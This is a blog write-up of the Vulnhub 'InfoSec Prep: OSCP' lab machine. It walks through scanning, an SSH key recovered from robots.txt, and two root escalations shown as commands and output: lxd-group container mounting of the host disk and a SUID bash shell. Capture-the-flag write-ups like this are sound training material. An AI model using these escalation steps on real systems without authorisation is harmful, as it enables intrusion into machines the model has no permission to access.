Vulnhub: InfoSec Prep: OSCP

Posted on 10 Aug 2020 in security • 4 min read

Book card

This is a writeup about a vulnhub machine InfoSec Prep This box is an really easy box in order to make a small selection for entering a give away for a 30d voucher to the OSCP Lab, Lab materials, and an exam attempt. The box was created by FalconSpy and publish on July 11 2020. It involves a robots.txt file, some base64 an SSH key, lxd and a SUID binary.



We start with an nmap scan. Only the ports 22 (SSH), 80 (HTTP) and 33060 (??) are open.

# Nmap 7.80 scan initiated Sat Jul 18 04:31:34 2020 as: nmap -p- -sSV -oN nmap_tcp
Nmap scan report for oscp.home (
Host is up (0.00093s latency).
Not shown: 65532 closed ports
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


On port 80 we found a classic wordpress blog. We run a wpscan on it but nothing pop out. We run a nikto on the box. It found an entry /secret.txt on the robots.txt file.

kali@kali:~$ nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2020-07-18 08:12:31 (GMT-4)
+ Server: Apache/2.4.41 (Ubuntu)
+ RFC-1918 IP address found in the 'link' header. The IP is "".
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <>; rel=""
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

The file is a RSA private key encoded in base64. Once decoded we store it in a ssh_key file.

We just need to know what the user is. We continue to browse the website and display the admin user page ( it state that the only use on the box is oscp so we connect on SSH as oscp using SSH key.

kali@kali:~$ ssh oscp@ -i id_rsa 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)


I found two ways to get root. The first one (unintended) with lxc and the second one with an SUID binary.


Once we have a shell on the box we run id and found out that we are part of the lxd group. This is a know privilege escalation.

~ # -bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

When we try to run the lxc (or lxd) command we got an error command not found so we run a quick search in order to find the binary path.

-bash-5.0$ lxc
-bash: lxc: command not found
-bash-5.0$ find / -name 'lxc' 2> /dev/null

Then we build clone the alipne image and build it on our system (as it require root permission), then we transfer it to the box.

kali@kali:~$ git clone
kali@kali:~$ cd lxd-alpine-builder/
kali@kali:~lxd-alpine-builder$ sudo ./build-alpine -a i686
Determining the latest release... v3.12
Using static apk from
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
kali@kali:~lxd-alpine-builder$ scp -i id_rsa alpine-v3.12-i686-20200717_0532.tar.gz oscp@

Then we try to import the image in the box. We first need to initialize lxd.

-bash-5.0$ /snap/bin/lxc image import ./alpine-v3.12-i686-20200717_0532.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04

Image imported with fingerprint: dcf00931e4bc5f738cb5d843593151420e4c27cf7c8152a3b91ec6c75bf4db6d
-bash-5.0$ /snap/bin/lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
Error: No storage pool found. Please create a new storage pool
-bash-5.0$ /snap/bin/lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:

Then we just boot the image, mounting the host disk and access the root flag.

-bash-5.0$ /snap/bin/lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
-bash-5.0$ /snap/bin/lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
-bash-5.0$ /snap/bin/lxc  start mycontainer
-bash-5.0$ /snap/bin/lxc exec mycontainer /bin/sh
~ # ls /mnt/root/
bin         cdrom       etc         lib         lib64       lost+found  mnt         proc        run         snap        swap.img    tmp         var
boot        dev         home        lib32       libx32      media       opt         root        sbin        srv         sys         usr
~ # ls /mnt/root/root/
fix-wordpress  flag.txt       snap
~ # ls /mnt/root/root/flag.txt
~ # cat /mnt/root/root/flag.txt

SUID bash

We can also list the SUID binary and found that /usr/bin/bash is SUID.

-bash-5.0$ find / -uid 0 -perm -4000 -type f 2>/dev/null

We just use the -p option in order to have a shell as root.

-bash-5.0$ bash -p
bash-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
bash-5.0# cat /root/flag.txt

Wrapping up

The box was really easy, a nice job from FalconSpy as it will allow "beginners" to enter the give away.